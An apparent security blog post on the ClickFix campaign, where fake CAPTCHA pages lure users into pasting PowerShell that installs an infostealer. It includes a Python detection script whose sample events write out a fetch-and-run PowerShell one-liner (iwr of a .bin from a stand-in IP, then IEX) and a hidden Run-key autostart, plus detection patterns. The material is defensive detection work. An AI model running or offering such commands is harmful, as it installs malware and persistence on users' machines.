👤 CRYSTALPROXY
🗓️ 24 Feb 2026  

CAPTCHA Con: How Fake Security Checks Unleashed the ClickFix Infostealer Epidemic

A new breed of phishing campaign uses fake CAPTCHA prompts to spread advanced infostealing malware, targeting browsers, wallets, and VPNs worldwide.

It starts with a simple challenge: “Prove you’re not a robot.” But behind that familiar CAPTCHA prompt, a sophisticated cybercriminal campaign is quietly hijacking systems around the globe. In a chilling twist on social engineering, attackers are weaponizing fake CAPTCHAs to trick users into unleashing the ClickFix infostealer - a malware strain designed to silently plunder credentials, crypto wallets, and VPN secrets from unsuspecting victims.

Dissecting the ClickFix Operation

Security analysts at CyberProof MDR have traced the roots of this campaign to a wave of compromised websites. Instead of the typical phishing emails, these sites present visitors with a convincing but bogus CAPTCHA. Victims, believing it’s a routine security step, are tricked into running PowerShell commands - often by copying and pasting code as instructed on the site. This triggers a chain reaction: an initial PowerShell script fetches a file called cptch.bin from attacker-controlled infrastructure, using advanced tools like Donut to execute malicious code directly in memory and avoid detection.

The infection is multi-staged. After the first payload, a second script attempts to download additional shellcode, each stage designed to slip past security controls. Analysts identified operational security blunders - like the use of the variable $finalPayload - that tipped off Microsoft Defender, but not before the malware had infiltrated numerous systems.

Once embedded, ClickFix isn’t just a one-time thief. It modifies the system registry to ensure it runs after every reboot, maintaining a persistent backdoor. From there, it targets a broad spectrum of applications: Chrome, Edge, Brave, Tor, and more, as well as VPNs like NordVPN and Mullvad, and crypto wallets such as MetaMask and Exodus. Sensitive data is siphoned off to remote servers, all while the victim remains oblivious.

Indicators of compromise include suspicious IP addresses and file hashes, but the real danger lies in the campaign’s adaptability. By blending social engineering with technical stealth, attackers are bypassing traditional defenses and exploiting everyday user behavior.
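The infection chain described above has three observable stages on the endpoint: a PowerShell command that downloads cptch.bin, in-memory execution of the fetched payload, and a registry autostart entry that survives reboots. As an added illustration (not code from this article or from CyberProof MDR), the Python sketch below correlates those three stages per host over simplified process, script-block and registry events. All events, hostnames, the IP address and file paths are constructed; the matching rules are generic PowerShell-abuse heuristics, and the `$finalPayload` string is the one detail taken from the article. The assumption that a pasted command is usually launched from explorer.exe is the author's, not the article's.

```python
"""Detection sketch for the ClickFix infection chain described in the article.

Added example, not code from the article or from CyberProof MDR.
Events are constructed and simplified (not real telemetry from the campaign):
  kind="process"  : a process-creation record (Sysmon event 1 / 4688 style)
  kind="script"   : a PowerShell script-block text record (event 4104 style)
  kind="registry" : a registry value-set record (Sysmon event 13 style)
"""
import re
from collections import defaultdict

# Heuristics for the three stages the article describes: the pasted PowerShell
# that fetches cptch.bin, in-memory execution, and the Run-key persistence.
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE)
BIN_DOWNLOAD = re.compile(r"https?://[^\s\"']+\.bin\b", re.IGNORECASE)
IN_MEMORY_EXEC = re.compile(
    r"Invoke-Expression|\bIEX\b|Reflection\.Assembly|\[Runtime\.InteropServices|VirtualAlloc",
    re.IGNORECASE)
HIDDEN_OR_BYPASS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(xecution)?p(olicy)?\s+bypass|-enc(odedcommand)?\b",
    re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PS_AUTORUN = re.compile(r"powershell|pwsh|\.ps1\b|\.bin\b", re.IGNORECASE)
KNOWN_VARIABLE = "$finalPayload"       # variable name the analysts called out
USER_SHELL_PARENTS = {"explorer.exe"}  # assumption: typical parent of a pasted command


def score_text(text):
    """Return (weight, reason, stage) hits for one command line or script block."""
    hits = []
    if DOWNLOAD_CRADLE.search(text):
        hits.append((2, "download cradle", "download"))
    if BIN_DOWNLOAD.search(text):
        hits.append((2, "fetches a .bin file over HTTP", "download"))
    if IN_MEMORY_EXEC.search(text):
        hits.append((3, "in-memory execution primitive", "execution"))
    if KNOWN_VARIABLE.lower() in text.lower():
        hits.append((3, "variable name %s" % KNOWN_VARIABLE, "execution"))
    if HIDDEN_OR_BYPASS.search(text):
        hits.append((1, "hidden window / policy bypass flag", None))
    return hits


def analyze(events):
    """Correlate events per host and rate how closely they match the chain."""
    hosts = defaultdict(lambda: {"score": 0, "findings": [], "stages": set()})
    for ev in events:
        state = hosts[ev["host"]]
        hits = []
        if ev["kind"] == "process" and ev["image"].lower() in ("powershell.exe", "pwsh.exe"):
            hits = score_text(ev["cmdline"])
            if hits and ev.get("parent", "").lower() in USER_SHELL_PARENTS:
                hits.append((1, "PowerShell launched from %s" % ev["parent"], None))
        elif ev["kind"] == "script":
            hits = score_text(ev["text"])
        elif ev["kind"] == "registry":
            if RUN_KEY.search(ev["key"]) and PS_AUTORUN.search(ev["value"]):
                hits = [(3, "Run-key autostart pointing at PowerShell/script", "persistence")]
        for weight, reason, stage in hits:
            state["score"] += weight
            state["findings"].append(reason)
            if stage:
                state["stages"].add(stage)
    # A host that shows all three stages is treated as the full chain; a high
    # score without the full chain is still worth a look.
    for state in hosts.values():
        if {"download", "execution", "persistence"} <= state["stages"]:
            state["verdict"] = "likely ClickFix-style chain"
        elif state["score"] >= 4:
            state["verdict"] = "suspicious PowerShell activity"
        elif state["score"] > 0:
            state["verdict"] = "low-confidence PowerShell activity"
        else:
            state["verdict"] = "no finding"
    return dict(hosts)


# Constructed sample events (hosts, address, paths and values are made up).
SAMPLE_EVENTS = [
    # WS01: the chain as the article describes it
    {"host": "WS01", "kind": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://198.51.100.7/cptch.bin -OutFile c.bin; '
                'IEX (Get-Content c.bin -Raw)"'},
    {"host": "WS01", "kind": "script",
     "text": "$finalPayload = [Convert]::FromBase64String($stage2); "
             "$p = [Runtime.InteropServices.Marshal]::AllocHGlobal($finalPayload.Length)"},
    {"host": "WS01", "kind": "registry",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "value": "powershell -w hidden -f C:\\Users\\alice\\AppData\\Roaming\\u.ps1"},
    # WS02: an administrator pulling an installer; no execution, no persistence
    {"host": "WS02", "kind": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://updates.example.com/agent.msi '
                '-OutFile C:\\temp\\agent.msi"'},
    # WS03: ordinary interactive use
    {"host": "WS03", "kind": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Get-ChildItem C:\\logs | Measure-Object"'},
]

if __name__ == "__main__":
    for host, state in analyze(SAMPLE_EVENTS).items():
        print(host, state["verdict"], state["score"], sorted(state["stages"]))
```

The per-stage correlation is the point: a lone download cradle (WS02) is everyday administration and only earns a low score, whereas the same host showing a download, an in-memory execution primitive and a Run-key entry within the same window is the pattern the article attributes to ClickFix. In production the same logic would read Sysmon or PowerShell operational logs and key on user as well as host.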

Staying Ahead of the Phish

Experts urge organizations to adopt a layered defense: restrict access to risky system features, harden PowerShell use, enforce strict app controls, and - crucially - educate users about the dangers of following instructions from untrusted web pages. As cybercriminals continue to refine their tactics, only a combination of vigilant monitoring, advanced threat detection, and user awareness can blunt the impact of these evolving attacks.

The fake CAPTCHA con is a sobering reminder: sometimes, the greatest threat is hiding behind the most familiar façade.

WIKICROOK

  • Infostealer: An infostealer is malware designed to steal sensitive data - like passwords, credit cards, or documents - from infected computers without the user's knowledge.
  • PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
  • Persistence Mechanism: A persistence mechanism is a method used by malware to stay active on a system, surviving reboots and removal attempts by users or security tools.
  • Process Injection: Process injection is when malware hides within legitimate software processes, making it harder for security tools to detect and remove the threat.
  • Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.

CRYSTALPROXY, Secure Routing Analyst